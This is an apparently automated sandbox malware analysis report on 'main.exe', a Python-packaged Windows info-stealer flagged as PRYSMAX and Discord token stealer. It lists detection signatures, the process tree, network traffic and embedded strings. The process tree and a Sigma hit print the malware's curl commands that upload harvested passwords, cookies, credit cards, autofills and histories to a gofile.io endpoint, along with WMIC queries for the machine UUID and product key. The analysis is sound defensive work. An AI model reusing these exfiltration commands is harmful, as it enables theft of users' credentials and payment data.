Windows Analysis Report
main.exe

Overview

General Information

Sample name: main.exe
Analysis ID: 1579350
MD5: c0e4c8f676e781c9dd3d57ffa4f99111
SHA1: 94a6f60949f38da538b5227722698dd880961bb2
SHA256: 9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Tags: exe, user-JaffaCakes118

Detection

Python Stealer, Discord Token Stealer, PRYSMAX STEALER
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Discord Token Stealer
Yara detected PRYSMAX STEALER
Yara detected Telegram RAT
Found pyInstaller with non standard icon
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • main.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
    • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7808 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 7336 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1360 cmdline: C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 6112 cmdline: wmic path softwarelicensingservice get OA3xOriginalProductKey MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3384 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5308 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 396 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1016 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 3312 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2828 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5928 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1148 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 908 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 5804 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DiscordTokenStealer | Yara detected Discord Token Stealer | Joe Security |
00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PRYSMAXSTEALER | Yara detected PRYSMAX STEALER | Joe Security |
00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
Process Memory Space: main.exe PID: 7680 | JoeSecurity_DiscordTokenStealer | Yara detected Discord Token Stealer | Joe Security |
Process Memory Space: main.exe PID: 7680 | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
            Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe", ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7680, ParentProcessName: main.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", ProcessId: 7272, ProcessName: cmd.exe
            No Suricata rule has matched

            AV Detection

            Source: main.exe, Avira: detected
            Source: main.exe, ReversingLabs: Detection: 15%
            Source: main.exe, Virustotal: Detection: 23%
            Source: C:\Users\user\Desktop\main.exe, File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt
            Source: main.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,0_2_00007FF733398840
            Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF733397800
            Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7333B2AE4
            Source: Joe Sandbox View, IP Address: 208.95.112.1
            Source: Joe Sandbox View, IP Address: 45.112.123.126
            Source: unknown, DNS query: name: ip-api.com
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic, HTTP traffic detected: GET /servers HTTP/1.1 | Accept-Encoding: identity | Host: api.gofile.io | User-Agent: Python-urllib/3.11 | Connection: close
            Source: global traffic, HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | User-Agent: python-requests/2.32.3 | Accept-Encoding: gzip, deflate, br, zstd | Accept: */* | Connection: keep-alive
            Source: global traffic, HTTP traffic detected: GET /json/8.46.123.189?fields=192511 HTTP/1.1 | Host: ip-api.com | User-Agent: python-requests/2.32.3 | Accept-Encoding: gzip, deflate, br, zstd | Accept: */* | Connection: keep-alive
            Source: global traffic, DNS traffic detected: DNS query: api.gofile.io
            Source: global traffic, DNS traffic detected: DNS query: ip-api.com
            Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982536657.000001E893A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
            Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
            Source: main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
            Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980318164.000001E894A46000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005241333.000001E894B14000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005844026.000001E894B17000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894AB6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025066924.000001E894A49000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
            Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
            Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: main.exe, 00000002.00000002.2026258242.000001E894E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
            Source: main.exe, 00000002.00000003.1972543562.000001E893395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
            Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://github.com/ActiveState/appdirs
            Source: main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002633127.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023486431.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011999083.000001E894703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
            Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
            Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
            Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
            Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es-
            Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
